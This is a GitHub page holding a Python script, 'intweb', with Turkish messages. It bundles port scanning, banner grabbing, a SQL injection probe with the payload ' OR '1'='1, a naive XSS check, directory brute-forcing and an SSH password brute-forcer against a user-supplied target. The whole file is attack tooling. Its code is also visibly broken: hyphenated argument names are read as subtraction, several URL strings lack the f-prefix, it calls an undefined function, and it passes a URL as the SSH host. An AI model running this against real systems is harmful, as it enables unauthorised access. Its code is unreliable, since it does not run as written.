-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathintweb
133 lines (122 loc) · 5.02 KB
/
intweb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
import socket
import argparse
import requests
from bs4 import BeautifulSoup
def port_scan(target_host, target_ports):
try:
target_ip = socket.gethostbyname(target_host)
except socket.gaierror:
print(f'Hedef "{target_host}" çözümlenemedi.')
return []
print(f'Tarama başlatılıyor: {target_host}')
open_ports = []
for port in target_ports:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((target_ip, port))
if result == 0:
open_ports.append(port)
print(f'Port {port} açık')
sock.close()
return open_ports
def http_header_scan(target_url):
try:
response = requests.head(target_url, timeout=3)
print(f'HTTP başlığı alındı: {response.headers}')
except requests.exceptions.RequestException as e:
print(f'Hata: {e}')
def sql_injection_scan(target_url):
# Örnek SQL enjeksiyon taraması
payload = "' OR '1'='1"
try:
response = requests.get(target_url + f"/search?query={payload}", timeout=5)
if "error" in response.text:
print("SQL enjeksiyonu bulundu.")
else:
print("SQL enjeksiyonu tespit edilemedi.")
except requests.exceptions.RequestException as e:
print(f'Hata: {e}')
def vulnerability_scan(target_url):
# Temel güvenlik zafiyet taraması (örneğin XSS kontrolü)
try:
response = requests.get(target_url, timeout=5)
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
if forms:
print('XSS açığı olabilir: Formlar bulundu.')
else:
print('XSS açığı bulunamadı.')
except requests.exceptions.RequestException as e:
print(f'Hata: {e}')
def brute_force_ssh(host, username, password_list):
for password in password_list:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((host, 22))
if result == 0:
try:
import paramiko
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(host, username=username, password=password)
print(f'Başarılı SSH girişi: {username}@{host} - {password}')
client.close()
return
except paramiko.AuthenticationException:
pass
except ImportError:
print('Paramiko modülü eksik. Lütfen yükleyin: pip install paramiko')
sock.close()
def dir_scan(target_url, dir_list):
for directory in dir_list:
url = f"{target_url}/{directory}"
try:
response = requests.get(url, timeout=3)
if response.status_code == 200:
print(f'Bulunan dizin: {url}')
except requests.exceptions.RequestException as e:
pass
def banner_grab(target_host, target_port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.connect((target_host, target_port))
sock.send(b'HEAD / HTTP/1.0\r\n\r\n')
banner = sock.recv(1024)
print(f'Banner bilgisi: {banner.decode()}')
sock.close()
except socket.error as e:
print(f'Hata: {e}')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='intweb', prog='intweb', formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('target', help='Hedef IP veya URL', )
parser.add_argument("-v", "--vulnerability-scanner", help='Vulnerability scan')
parser.add_argument("-s", "--sql-injection", help='Sql injection Scan')
parser.add_argument('-u', '--username', help='target mail for bruteforce')
parser.add_argument("-ps", '--password-list', help='password list for bruteforce')
parser.add_argument("-b", '--bruteforce-ssh', help='Bruteforce')
parser.add_argument('--dirscan', action='store_true', help='Dir scanning')
parser.add_argument('--banner', action='store_true', help='Banner Grabbing')
parser.add_argument('-d', '--dir', help='dir for dirscan')
parser.add_argument('-p', '--ports', nargs='+', type=int, default=[80, 443],
help='Taranacak port numaraları (varsayılan: 80, 443)')
args = parser.parse_args()
target = args.target
ports = args.ports
passw = args.password-list
us = args.username
dir = args.dir
open_ports = port_scan(target, ports)
if open_ports:
# HTTP başlığı taraması sadece ilk açık port için yapılıyor
http_header_scan(f'http://{target}:{open_ports[0]}')
if args.vulnerability-scanner:
vulnerability_scan('http://{target}')
if args.sql-injection:
sql_injection_scan('http://{target}')
if args.bruteforce-ssh:
brute_force_ssh('http://{target}', us, passw)
if args.dirscan:
dirscan('http://{target}', dir)
if args.banner:
banner_grab('http://{target}', ports)